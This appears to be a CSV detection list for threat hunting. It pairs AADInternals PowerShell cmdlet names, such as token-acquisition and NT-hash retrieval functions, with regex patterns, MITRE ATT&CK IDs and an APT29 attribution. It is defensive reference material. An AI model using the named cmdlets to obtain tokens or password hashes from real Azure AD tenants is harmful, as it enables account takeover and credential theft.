"*Get-AADIntAccessPackageAdmins*",".{0,1000}Get\-AADIntAccessPackageAdmins.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAccessPackageCatalogs*",".{0,1000}Get\-AADIntAccessPackageCatalogs.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAccessPackages*",".{0,1000}Get\-AADIntAccessPackages.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAccessToken*",".{0,1000}Get\-AADIntAccessToken.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAccessTokenFor<service>*",".{0,1000}Get\-AADIntAccessTokenFor\<service\>.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAccessTokenForAADGraph*",".{0,1000}Get\-AADIntAccessTokenForAADGraph.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAccessTokenForAADIAMAPI*",".{0,1000}Get\-AADIntAccessTokenForAADIAMAPI.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAccessTokenForAADJoin*",".{0,1000}Get\-AADIntAccessTokenForAADJoin.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAccessTokenForAccessPackages*",".{0,1000}Get\-AADIntAccessTokenForAccessPackages.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAccessTokenForAdmin*",".{0,1000}Get\-AADIntAccessTokenForAdmin.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAccessTokenForAzureCoreManagement*",".{0,1000}Get\-AADIntAccessTokenForAzureCoreManagement.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAccessTokenForAzureMgmtAPI*",".{0,1000}Get\-AADIntAccessTokenForAzureMgmtAPI.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAccessTokenForCloudShell*",".{0,1000}Get\-AADIntAccessTokenForCloudShell.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAccessTokenForEXO*",".{0,1000}Get\-AADIntAccessTokenForEXO.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAccessTokenForEXOPS*",".{0,1000}Get\-AADIntAccessTokenForEXOPS.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAccessTokenForIntuneMDM*",".{0,1000}Get\-AADIntAccessTokenForIntuneMDM.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAccessTokenForMDM*",".{0,1000}Get\-AADIntAccessTokenForMDM.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAccessTokenForMSCommerce*",".{0,1000}Get\-AADIntAccessTokenForMSCommerce.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAccessTokenForMSGraph*",".{0,1000}Get\-AADIntAccessTokenForMSGraph.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAccessTokenForMSPartner*",".{0,1000}Get\-AADIntAccessTokenForMSPartner.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAccessTokenForMySignins*",".{0,1000}Get\-AADIntAccessTokenForMySignins.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAccessTokenForOfficeApps*",".{0,1000}Get\-AADIntAccessTokenForOfficeApps.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAccessTokenForOneDrive*",".{0,1000}Get\-AADIntAccessTokenForOneDrive.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAccessTokenForOneNote*",".{0,1000}Get\-AADIntAccessTokenForOneNote.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAccessTokenForOneOfficeApps*",".{0,1000}Get\-AADIntAccessTokenForOneOfficeApps.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAccessTokenForPTA*",".{0,1000}Get\-AADIntAccessTokenForPTA.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAccessTokenForSARA*",".{0,1000}Get\-AADIntAccessTokenForSARA.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAccessTokenForSPO*",".{0,1000}Get\-AADIntAccessTokenForSPO.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAccessTokenForTeams*",".{0,1000}Get\-AADIntAccessTokenForTeams.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAccessTokenForWHfB*",".{0,1000}Get\-AADIntAccessTokenForWHfB.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAccessTokenUsingAdminAPI*",".{0,1000}Get\-AADIntAccessTokenUsingAdminAPI.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAccessTokenUsingIMDS*",".{0,1000}Get\-AADIntAccessTokenUsingIMDS.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAccessTokenWithRefreshToken*",".{0,1000}Get\-AADIntAccessTokenWithRefreshToken.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAccountSkus*",".{0,1000}Get\-AADIntAccountSkus.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntADFSPolicyStoreRules*",".{0,1000}Get\-AADIntADFSPolicyStoreRules.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAdminPortalAccessTokenUsingCBA*",".{0,1000}Get\-AADIntAdminPortalAccessTokenUsingCBA.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntADUserNTHash*",".{0,1000}Get\-AADIntADUserNTHash.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAdUserNTHash*",".{0,1000}Get\-AADIntAdUserNTHash.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntADUserThumbnailPhoto*",".{0,1000}Get\-AADIntADUserThumbnailPhoto.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAgentProxyGroups*",".{0,1000}Get\-AADIntAgentProxyGroups.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAzureADFeature*",".{0,1000}Get\-AADIntAzureADFeature.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAzureADFeatures*",".{0,1000}Get\-AADIntAzureADFeatures.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAzureADPolicies*",".{0,1000}Get\-AADIntAzureADPolicies.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAzureAuditLog*",".{0,1000}Get\-AADIntAzureAuditLog.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAzureClassicAdministrators*",".{0,1000}Get\-AADIntAzureClassicAdministrators.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAzureDiagnosticSettings*",".{0,1000}Get\-AADIntAzureDiagnosticSettings.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAzureDirectoryActivityLog*",".{0,1000}Get\-AADIntAzureDirectoryActivityLog.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAzureInformation*",".{0,1000}Get\-AADIntAzureInformation.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAzureResourceGroups*",".{0,1000}Get\-AADIntAzureResourceGroups.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAzureRoleAssignmentId*",".{0,1000}Get\-AADIntAzureRoleAssignmentId.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAzureSignInLog*",".{0,1000}Get\-AADIntAzureSignInLog.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
